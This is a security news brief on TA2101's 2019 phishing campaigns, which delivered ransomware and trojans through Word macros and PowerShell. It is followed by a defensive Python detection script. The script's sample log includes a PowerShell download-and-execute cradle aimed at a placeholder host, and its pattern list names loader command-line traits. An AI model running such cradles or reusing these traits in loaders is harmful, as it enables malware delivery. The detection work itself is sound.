Delaware, USA – November 15, 2019 – A relatively new threat actor is sending spam emails disguised as notifications from government agencies to infect victims with penetration testing frameworks, ransomware, and banking trojans. Proofpoint researchers found that the attackers carried out their first campaign only a month ago; it was not large-scale, and its main targets were IT services companies in Germany. Emails from TA2101 pretended to be notifications about tax refunds sent by the German Federal Ministry of Finance. The attachment was a Microsoft Word document with a malicious macro that ran PowerShell scripts to install Maze ransomware and the Cobalt Strike penetration testing tool. A week later, the attackers repeated the trick, and at the end of October they conducted a similar campaign in Italy, changing the sender to the Italian Ministry of Taxation. The main targets of this campaign were manufacturing companies, and the malicious scripts installed only ransomware. Starting with this campaign, TA2101 changed the lure document that convinces the user to enable scripts: the spam emails now allegedly contain an RSA SecurID key, and victims can open them only with “desktop or laptop versions of Microsoft Word”.
In November, the adversaries launched two campaigns against German business and IT services companies, and on November 12 they launched their first campaign in the United States, targeting the healthcare sector. Unlike the European campaigns, this one used the IcedID trojan as the final payload. TA2101 is evolving rapidly, experimenting with different malware families and preferred victims. The cybercriminals rely on social engineering and spoofed, legitimate-looking sender addresses to persuade victims to open malicious attachments and enable scripts. You can detect the abuse of PowerShell to deliver malware using the rules available on the Threat Detection Marketplace: https://tdm.socprime.com/
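The delivery chain described above (a Word macro launching PowerShell, which then fetches the loader) leaves a distinctive trace in process-creation telemetry. The following is an added example of the kind of detection logic that catches it; it is not SOC Prime's or Proofpoint's code and does not reproduce any Threat Detection Marketplace rule. The log lines are constructed in the style of Sysmon Event ID 1 (process creation), and the `key=value|key=value` layout and field names are assumptions made for the example.

```python
"""Flag process-creation events where an Office application spawns PowerShell,
or where PowerShell is started with several loader-style command-line traits.

Added example for the TA2101 brief; not SOC Prime's, Proofpoint's, or any TDM
rule's code. Sample events are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Command-line traits that typically accompany script-based loaders:
# encoded commands, hidden windows, profile suppression, in-memory download-and-run.
SUSPICIOUS_ARGS = [
    re.compile(r"-(enc|encodedcommand|e)\b", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    re.compile(r"downloadstring|downloadfile|iex|invoke-expression", re.I),
    re.compile(r"-nop\b|-noprofile\b", re.I),
]


@dataclass
class Finding:
    event_id: str
    reason: str
    severity: str


def parse_event(line):
    """Parse 'key=value|key=value' (assumed layout) into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return a Finding for one process-creation event, or None if it looks benign."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in POWERSHELL_IMAGES:
        return None
    hits = [p.pattern for p in SUSPICIOUS_ARGS if p.search(cmdline)]
    if parent in OFFICE_PARENTS:
        # Word/Excel launching PowerShell is the macro-to-loader chain from the brief;
        # it is high severity when loader-style flags are also present.
        severity = "high" if hits else "medium"
        return Finding(event["EventId"], f"Office parent {parent} spawned {image}", severity)
    if len(hits) >= 2:
        return Finding(event["EventId"], "PowerShell with multiple loader-style flags", "medium")
    return None


def scan(lines):
    """Evaluate every log line and return the list of findings."""
    return [f for f in (evaluate(parse_event(line)) for line in lines) if f]


# Constructed sample events (not real telemetry); hosts and URL are placeholders.
SAMPLE_LOG = [
    "EventId=1001|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgA",
    "EventId=1002|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "EventId=1003|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=powershell.exe -NoProfile -WindowStyle Hidden -Command IEX "
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    "EventId=1004|Image=C:\\Windows\\System32\\notepad.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding.event_id, finding.severity, finding.reason)
```

Running the block flags event 1001 (Word spawning an encoded, hidden PowerShell) as high and event 1003 (a download cradle launched from cmd.exe) as medium, while the scheduled backup script and the notepad launch pass. The parent-process check is the durable part: attackers can rename flags or obfuscate the cradle, but a Word process that starts PowerShell is rarely legitimate in most environments and is the condition worth alerting on first.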